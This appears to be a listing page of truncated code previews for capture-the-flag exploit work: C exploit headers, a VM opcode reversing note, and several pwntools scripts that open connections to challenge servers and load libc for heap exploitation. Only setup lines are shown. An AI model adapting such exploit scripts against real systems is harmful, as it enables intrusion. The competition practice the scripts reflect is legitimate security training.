This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define _GNU_SOURCE | |
#include <err.h> | |
#include <stdint.h> | |
#include <linux/bpf.h> | |
#include <linux/filter.h> | |
#include <stdio.h> | |
#include <unistd.h> | |
#include <sys/syscall.h> | |
#include <asm/unistd_64.h> | |
#include <sys/types.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <sys/types.h> | |
#include <sys/stat.h> | |
#include <fcntl.h> | |
#include <poll.h> | |
#include <pthread.h> | |
#include <unistd.h> | |
#include <sys/ioctl.h> | |
#include <sys/mman.h> | |
#include <sys/syscall.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// gcc -static -o exploit2 exploit2.c -lpthread | |
// NOTE: compiling using uclibc to get small sized binary | |
#include <stdio.h> | |
#include <sys/types.h> | |
#include <sys/stat.h> | |
#include <fcntl.h> | |
#include <poll.h> | |
#include <pthread.h> | |
#include <unistd.h> | |
#include <sys/ioctl.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
opcode: 0xa | |
if al >= 0x20 | |
int3() | |
rdi = eax | |
rsi = (rdi*8 + rdi)*8 | |
rdx = *(0x10400+rsi) | |
*(rdx+0x40) = 1 | |
opcode: 0xb | |
if al >= 0x20 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
import random | |
p = 0 | |
while True: | |
try: | |
# p = process("./blindshot") | |
p = remote("pwn01.chal.ctf.westerns.tokyo", 12463) | |
libc = ELF("./libc-2.31.so", checksec=False) | |
off = 0xb80 | |
off = 0x8 | off << 4 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
from random import randint | |
proc_name = "./tcache_king" | |
context.terminal = "tmux splitw -h -f".split() | |
#p = process(proc_name, env={"LD_PRELOAD":"./libc6_2.31-0ubuntu9_amd64.so"}) | |
p = remote("128.199.157.172", 20978) | |
libc = ELF("./libc6_2.31-0ubuntu9_amd64.so") | |
#p = process(proc_name) | |
#libc = ELF("/opt/glibc2.31/lib/libc.so.6") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
import sys | |
from math import floor, ceil | |
from typing import AnyStr | |
# craft gif: http://giflib.sourceforge.net/whatsinagif/bits_and_bytes.html | |
ASCII_TO_INT: dict = {i.to_bytes(1, 'big'): i for i in range(256)} | |
INT_TO_ASCII: dict = {i: b for b, i in ASCII_TO_INT.items()} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
context.terminal = "tmux splitw -h -f".split() | |
#p = process("./card") | |
#libc = ELF("/opt/glibc2.31/lib/libc-2.31.so", checksec=False) | |
#libc.off_leak = 3889536 | |
#p = process("./card", env={"LD_PRELOAD":"./libc.so.6"}) | |
p = remote("45.77.72.122", 9777) | |
libc = ELF("./libc.so.6", checksec=False) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
context.terminal = "tmux splitw -h -f".split() | |
#p = process("./card") | |
#libc = ELF("/opt/glibc2.31/lib/libc-2.31.so", checksec=False) | |
#libc.off_leak = 3889536 | |
#p = process("./card", env={"LD_PRELOAD":"./libc.so.6"}) | |
p = remote("45.77.72.122", 9777) | |
libc = ELF("./libc.so.6", checksec=False) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import gmpy2 | |
import binascii | |
key = binascii.unhexlify("85:d6:be:78:57:55:6d:33:7f:44:52:fe:42:d5:06:a8:01:03:80:8a:fb:0d:b2:fd:4a:bf:f6:af:41:49:f5:1b".replace(":", "")) | |
def clamp(r): | |
return r & 0x0ffffffc0ffffffc0ffffffc0fffffff | |
def poly_mac(msg, key): |